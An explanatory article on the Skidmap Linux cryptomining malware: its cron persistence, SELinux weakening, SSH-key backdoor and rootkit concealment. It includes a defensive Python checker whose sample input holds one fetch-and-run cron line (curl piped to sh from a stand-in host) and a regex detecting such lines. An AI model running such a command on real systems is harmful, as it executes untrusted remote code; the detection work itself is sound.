Skidmap Malware Attack

Skidmap, a Linux malware, demonstrates the increasing complexity of recent cryptocurrency-mining threats. This malware is notable because of the way it loads malicious kernel modules to keep its cryptocurrency mining operations under the radar.

Skidmap then installs multiple malicious binaries, the first of which weakens the infected machine’s security settings so that it can begin mining cryptocurrency unhindered. Trend Micro warns that Skidmap “demonstrates the increasing complexity of recent cryptocurrency-mining threats”, pointing out that it is “notable because of the way it loads malicious kernel modules to keep its cryptocurrency mining operations under the radar”.

In the infection chain, the Skidmap miner installs itself via crontab; the malicious code then downloads and executes the main binary. The malware weakens the security settings of the target system by setting the Security-Enhanced Linux (SELinux) module to permissive mode, or by disabling the SELinux policy and setting selected processes to run in confined domains.

Skidmap also provides attackers with backdoor access to the infected machine.

“Skidmap also sets up a way to gain backdoor access to the machine. It does this by having the binary add the public key of its handlers to the authorized_keys file, which contains keys needed for authentication,” continues the report.
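A defender-side check for the three host changes described above (a fetch-and-run cron job, a weakened SELinux mode, and an unapproved key in authorized_keys), as an added example that is not taken from the Trend Micro report. The sample inputs are constructed, the function names are hypothetical, and the curl/wget-piped-to-a-shell cron pattern is an assumption about what such an entry looks like.

```python
import re

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-")

def selinux_weakened(config_text):
    """True if /etc/selinux/config content sets SELINUX to permissive or disabled."""
    for line in config_text.splitlines():
        m = re.match(r"\s*SELINUX\s*=\s*(\w+)", line)  # does not match SELINUXTYPE=
        if m:
            return m.group(1).lower() in ("permissive", "disabled")
    return False

def unexpected_keys(authorized_keys_text, approved_blobs):
    """Return (key type, comment) for every key whose base64 blob is not approved.
    Simplification: assumes no option string contains a key-type token."""
    found = []
    for line in authorized_keys_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        for i, tok in enumerate(fields[:-1]):  # skip any leading options field
            if tok.startswith(KEY_TYPES):
                if fields[i + 1] not in approved_blobs:
                    found.append((tok, " ".join(fields[i + 2:])))
                break
    return found

def fetch_and_run_jobs(cron_text):
    """Return cron lines that download something and pipe it into a shell."""
    pat = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
    return [l for l in cron_text.splitlines()
            if not l.lstrip().startswith("#") and pat.search(l)]

# Constructed sample inputs (not real indicators).
SAMPLE_SELINUX = "# constructed sample\nSELINUX=permissive\nSELINUXTYPE=targeted\n"
SAMPLE_KEYS = ("ssh-ed25519 AAAAC3approvedblob admin@example\n"
               "ssh-rsa AAAAB3unknownblob\n")
APPROVED = {"AAAAC3approvedblob"}
SAMPLE_CRON = ("*/5 * * * * curl -fsSL http://example.invalid/x | sh\n"
               "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n")

if __name__ == "__main__":
    print("SELinux weakened:", selinux_weakened(SAMPLE_SELINUX))
    print("Unapproved keys:", unexpected_keys(SAMPLE_KEYS, APPROVED))
    print("Fetch-and-run cron jobs:", fetch_and_run_jobs(SAMPLE_CRON))
```

On a host suspected of running a rootkit that hides files, run checks like these against a disk image or from trusted boot media rather than on the live system.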

In particular, one rootkit will fake network traffic and CPU-related statistics to make it appear that the machine is clean. This will include the creation of sham traffic involving particular ports, IP addresses, CPU loads and processes. A CPU with a heavy load is a well-known indicator of cryptocurrency mining as the power used to work out the mathematical puzzles required to secure digital coins is generally high. In Skidmap’s case, traffic information is faked to make CPU usage always appear low.


In addition, the malware is equipped with modules that can monitor cryptocurrency mining processes, hide specific files, and set up malicious cron jobs for executing other malicious files. The use of rootkits is an interesting development in the world of Linux-based cryptocurrency mining. Another recently discovered Trojan sample, called InnfiRAT, was found to contain functionality specifically designed for the theft of cryptocurrency-related wallet credentials on infected machines.